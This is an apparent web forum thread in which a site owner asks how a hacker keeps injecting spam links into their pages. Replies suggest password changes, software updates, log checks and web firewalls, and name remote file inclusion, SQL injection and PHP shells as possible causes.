Hello Knowledgeable DP Users, My website, which currently resides on a Linux server, is being attacked by a hacker who is repeatedly placing large blocks of Spam hyperlinks in the markup. At first I had the CHMOD permissions wide open, and I changed them to owner modifications only, and assumed this would do the trick, but I discovered today that the hacker is doing the modifications in some other way. I am wondering, do they have my FTP password? Is there any way of knowing this or how they got it? Is there any way of determining how they are modifying my pages or any logs or records of FTP transfers or other accesses to my account? This problem seriously worries me because I am not a security expert, I'm unsure it can be solved and it will be hard to find a person who cares as much about this site as I do...I would not have ever even seen the blocks of links had I not examined the html a few weeks ago and initially recognized the modifications. Would appreciate someone's help or professional advice!
First and foremost remove any trace of spam left by the spammer. I assume many of your webpages must be full of spam. Do a search for the infacted pages and remove the pages from google (if necessary). Once you have cleaned the pages consider a reinclusion request through webmaster tools.
First of all, you shouldn't have same root password for all your sites. Example: For root login, password = asdfg AND individual sites' are also asdfg If a hacker get a hold of a password he can access any site since its root password. - To prevent: change root password and indivdual passwords (note them down in notepad) and use the encrypt or password generator provided to you (as with WHM/cpanel, you can generate password like ddj)8^% Next: Are your site scripts up-to-date and still supported by creator? As in updates, fixes, security packages? (2 incidents for me: once the site was exploited and hacked into because of me not updating the script with latest one and the other due to old script no longer supported) If emails are sent and spammed through your server, follow my info posted here: http://forums.digitalpoint.com/showthread.php?t=1163669 You could also ask your host support to identify the ip of the abuser for you and block the ip. If the problems till persist, follow above guides/steps
Are any of you guys hosting with dreamhost? They had all their cpanel/ftp passwords cracked months ago. Yeah I'd do the above and look out for any directories, you don't recognise (rename to be on the safe side). Also update your software to the latest versions, especially if you are using WordPress. I'd also do Google and Yahoo searches for site:yousite.com +spamwords to see if their any clues in there.
Are you using Wordpress? If you have Wordpress installed, make sure it is always up to date and change all admin passwords.
Without more information such as the name of the site, the first suspect is some sort of Remote File Inclusion (RFI) attack that exploited a hole in one of your scripts to run an external script that did the actual insertions of the text into your pages. If someone can trick your script into running an external PHP script, they have write access to your site and can do anything they want. Determine whether the links are actually in the markup... if some of your content comes from a database, they could have done an SQL injection attack that would put the offending text into your database. It's possible they got your FTP login info, but that's less common than these other things. As has already been said, make sure all your scripts are up to date. You can also do a search for vulnerability advisories on each of your scripts at http://secunia.com/advisories/search/. If these attacks are RFI or SQL injection, they will show in your site access logs, but you have to know what to look for. For starters, get a timestamp from a hacked file, and search your logs for accesses that were happening at that moment.
just scan your website with calm antivirus free tool for cpanel, and change your ftp and cpanel account password. and check ftp conections is there any other ftp connection which you have never created if you find any illegal account just delete it. And use captcha where spammer post Bad Links. You can also use ip table to block user
Sounds like you may need a web server firewall. I host my website on Windows with IIS so I use Aqtronix Webknight (an open source IIS firewall), which does a great job. I am not sure what the best one is for Linux/Apache, but I did a Google search for Apache Firewall and here are some results I came up with ::: http://www.modsecurity.org/ http://www.binarysec.com/ Securing Apache 2: Step-by-Step Guide http://www.securityfocus.com/infocus/1786/ PHP Firewall http://firewallscript.com/ A web server firewall will most likely help you easily block this spammer and prevent/detect any future exploits.
I got money on an unsecure script that they have penestrated and added a phpshell like c99shell.php to your server. From there they can do whatever they want.